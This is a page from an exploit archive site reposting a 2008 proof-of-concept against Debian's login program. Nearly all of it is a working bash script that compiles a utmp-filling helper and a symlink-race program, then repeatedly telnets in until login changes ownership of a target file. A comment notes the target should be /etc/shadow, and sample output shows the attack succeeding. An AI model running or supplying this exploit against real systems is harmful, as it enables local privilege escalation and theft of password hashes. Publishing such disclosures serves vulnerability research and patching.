首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Debian GNU/Linux (symlink attack in login) Arbitrary File Ownership PoC
来源:www.vfcocus.net 作者:Paul Szabo 发布时间:2008-12-02  
#!/bin/bash -

echo '
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <utmp.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char *argv[])
{
  struct utmp entry;
  int i;

  entry.ut_type=LOGIN_PROCESS;
  strcpy(entry.ut_line,"/tmp/x");
  entry.ut_time=0;
  strcpy(entry.ut_user,"badguy");
  strcpy(entry.ut_host,"badhost");
  entry.ut_addr=0;
  for(i=1;i<9;i++) {
    entry.ut_pid=(pid_t)( i + (int)getpid() );
    sprintf(entry.ut_id,"bad%d",i);
    pututline(&entry);
  }
}
' > /tmp/fillutmp.c

cc -o /tmp/fillutmp /tmp/fillutmp.c

echo 'Ask someone with group utmp privileges to do:'
echo '  chgrp utmp /tmp/fillutmp; chmod 2755 /tmp/fillutmp'
echo -n 'Press [RETURN] to continue... '
read ANS

echo '
#include <unistd.h>

int main(int argc, char *argv[])
{
  while(1)
  {
    unlink("/tmp/x");
    symlink(argv[1],"/tmp/x");
    unlink("/tmp/x");
    symlink(argv[2],"/tmp/x");
  }
}
' > /tmp/jigglelnk.c

cc -o /tmp/jigglelnk /tmp/jigglelnk.c

HOST=`hostname` # or simply localhost?
echo "Which tty do you think a 'telnet $HOST' will use next?"
echo "(Do that telnet and see...)"
read TTY
echo "You said it will be '$TTY' ..."

ATK=/etc/debian_version # should be /etc/shadow

echo "Starting symlink re-jiggler ..."
/tmp/jigglelnk $TTY $ATK &
JIG=$!

LOOP=0
while :; do
  ((LOOP = $LOOP + 1))
  echo; echo; echo "Try = $LOOP"

  /tmp/fillutmp

  echo "Telnetting... if login succeeds, just exit for next try..."
  /usr/bin/telnet $HOST

  LS=`ls -ld $ATK`
  case "$LS" in
    *root*root* ) ;; # not done yet...
    * )
      echo; echo
      echo "Success after $LOOP tries!"
      echo "$LS"
      echo; echo
      break
    ;;
  esac
done

kill $JIG
rm /tmp/fillutmp /tmp/jigglelnk /tmp/x

# ...
# ~$ logout
# Connection closed by foreign host.
# Success after 12 tries!
# -rw------- 1 psz tty 4 Oct 28  2006 /etc/debian_version

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Andy's PHP Knowledgebase 0.92.
·Maxum Rumpus 6.0 Multiple Remo
·Cain & Abel <= v4.9.24 .RDP St
·bcoos 1.0.13 (viewcat.php cid)
·cpCommerce 1.2.6 (URL Rewrite)
·Electronics Workbench (EWB Fil
·Minimal Ablog 0.4 (SQL/FU/Bypa
·CMS MAXSITE Component Guestboo
·KTP Computer Customer Database
·serv-u7 local exp (php)
·KTP Computer Customer Database
·Quick Tree View .NET 3.1 (qtv.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved